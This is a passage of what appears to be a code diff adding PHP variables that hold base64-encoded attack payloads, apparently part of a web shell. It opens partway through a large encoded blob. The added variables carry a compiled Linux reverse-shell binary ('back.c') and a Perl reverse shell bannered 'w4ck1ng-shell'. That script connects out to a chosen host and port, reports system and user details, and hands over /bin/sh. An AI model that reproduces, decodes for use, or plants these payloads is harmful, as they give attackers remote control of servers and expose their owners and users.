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";
+
+$back_connect_c="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAA2IUECDQAAABMDAAAAAAAADQAIAAHACgAHAAZAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQILAkAACwJAAAFAAAAABAAAAEAAAAsCQAALJkECCyZBAg4AQAAPAEAAAYAAAAAEAAAAgAAAEAJAABAmQQIQJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAUAAAAAAAAAAAAAAARAAAAEgAAAAcAAAAKAAAACwAAAAgAAAAPAAAAAwAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAABgAAAAAAAAABAAAAAAAAAAkAAAAAAAAADAAAAAAAAAAAAAAADQAAAA4AAAACAAAABAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAABwBAAASAAAArAAAAAAAAABxAAAAEgAAADwAAAAAAAAACwIAABIAAABIAAAAAAAAAH0AAAASAAAAjAAAAAAAAACsAQAAEgAAAKUAAAAAAAAArwAAABIAAABjAAAAAAAAACcAAAASAAAAkwAAAAAAAADdAAAAEgAAAEMAAAAAAAAAOgAAABIAAABcAAAAAAAAAKoBAAASAAAAVgAAAAAAAAA2AAAAEgAAAHMAAAAAAAAA2QAAABIAAAB4AAAAAAAAACgAAAASAAAAbQAAAAAAAAAOAAAAEgAAAC4AAAAAAAAAeAAAABIAAAB9AAAA8IgECAQAAAARAA4ATwAAAAAAAAA5AAAAEgAAAAEAAAAAAAAAAAAAACAAAAAVAAAAAAAAAAAAAAAgAAAAAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AGNvbm5lY3QAZXhlY2wAcGVycm9yAGR1cDIAc3lzdGVtAHNvY2tldABiemVybwBzdHJjYXQAaW5ldF9hZGRyAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABkYWVtb24AX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAGNsb3NlAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEAAgAAAAAAAQABACQAAAAQAAAAAAAAABBpaQ0AAAIAsgAAAAAAAAAImgQIBhMAABiaBAgHAQAAHJoECAcCAAAgmgQIBwMAACSaBAgHBAAAKJoECAcFAAAsmgQIBwYAADCaBAgHBwAANJoECAcIAAA4mgQIBwkAADyaBAgHCgAAQJoECAcLAABEmgQIBwwAAEiaBAgHDQAATJoECAcOAABQmgQIBw8AAFSaBAgHEQAAVYnlg+wI6EEBAADolAEAAOjnAwAAycMA/zUQmgQI/yUUmgQIAAAAAP8lGJoECGgAAAAA6eD/////JRyaBAhoCAAAAOnQ/////yUgmgQIaBAAAADpwP////8lJJoECGgYAAAA6bD/////JSiaBAhoIAAAAOmg/////yUsmgQIaCgAAADpkP////8lMJoECGgwAAAA6YD/////JTSaBAhoOAAAAOlw/////yU4mgQIaEAAAADpYP////8lPJoECGhIAAAA6VD/////JUCaBAhoUAAAAOlA/////yVEmgQIaFgAAADpMP////8lSJoECGhgAAAA6SD/////JUyaBAhoaAAAAOkQ/////yVQmgQIaHAAAADpAP////8lVJoECGh4AAAA6fD+//8x7V6J4YPk8FBUUmhoiAQIaBSIBAhRVmiAhgQI6E/////0kJBVieVT6AAAAABbgcMHFAAAUouD/P///4XAdAL/0FhbycOQkJBVieWD7AiAPWSaBAgAdA/rH412AIPABKNgmgQI/9KhYJoECIsQhdJ168YFZJoECAHJw4n2VYnlg+wIoTyZBAiFwHQZuAAAAACFwHQQg+wMaDyZBAj/0IPEEI12AMnDkJBVieVXVlOD7EyD5PC4AAAAAIPAD4PAD8HoBMHgBCnEjX2ovvSIBAj8uQcAAADzpI19r/y5DgAAALAA86qD7AhqAGoB6FD+//+DxBBmx0XIAgCD7AyLRQyDwAj/MOi3/v//g8QQD7fAg+wMUOi4/v//g8QQZolFyoPsDItFDIPABP8w6DH+//+D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EgAAAFwCAAAAAAAAKAAAABIAAABsAgAAZJoECAAAAAAQAPH/cwIAAAyaBAgAAAAAEQAVAIkCAABomgQIAAAAABAA8f+OAgAAAAAAAA4AAAASAAAAnwIAAAAAAAB4AAAAEgAAALICAAAsmQQIAAAAABAC8f/FAgAA8IgECAQAAAARAA4A1AIAAFiaBAgAAAAAEAAWAOECAAAAAAAAOQAAABIAAADzAgAAAAAAAAAAAAAgAAAABwMAACyZBAgAAAAAEALx/x0DAAAAAAAAAAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
+
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+
